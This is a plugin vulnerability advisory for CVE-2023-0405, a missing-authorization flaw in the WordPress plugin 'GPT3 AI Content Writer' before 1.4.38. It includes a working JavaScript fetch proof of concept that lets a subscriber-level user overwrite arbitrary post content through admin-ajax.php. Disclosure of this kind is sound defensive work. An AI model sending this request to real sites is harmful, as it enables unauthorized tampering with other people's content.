GPT3 AI Content Writer < 1.4.38 – Subscriber+ Arbitrary Post Content Update | CVE 2023-0405 | Plugin Vulnerabilities

Description

The plugin does not perform any kind of nonce or privilege checks before letting logged-in users modify arbitrary posts.

Proof of Concept

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wpaicg_set_post_content_&post_id=1&content=CHANGED',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

gpt3-ai-content-generator

Fixed in 1.4.38

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

3ca9ac21-2bce-4480-9079-b4045b261273

Timeline

Publicly Published

2023-01-19 (about 2 years ago)

Added

2023-01-19 (about 2 years ago)

Last Updated

2023-01-19 (about 2 years ago)

Other

Published

Title

Published

2025-11-29

Title

OnPay.io for WooCommerce <= 1.0.47 - Missing Authorization

Published

2023-09-05

Title

Starter Templates <= 3.2.5 - Incorrect Authorization

Published

2025-07-17

Title

B1.lt for WooCommerce < 2.2.58 - Missing Authorization to Authenticated (Subscriber+) Arbitrary SQL Injection

Published

2024-12-30

Title

MP3 Audio Player for Music, Radio & Podcast by Sonaar < 5.9 - Missing Authorization

Published

2024-05-21

Title

ApplyOnline – Application Form Builder and Manager < 2.6.3 - Missing Authorization to Sensitive Information Exposure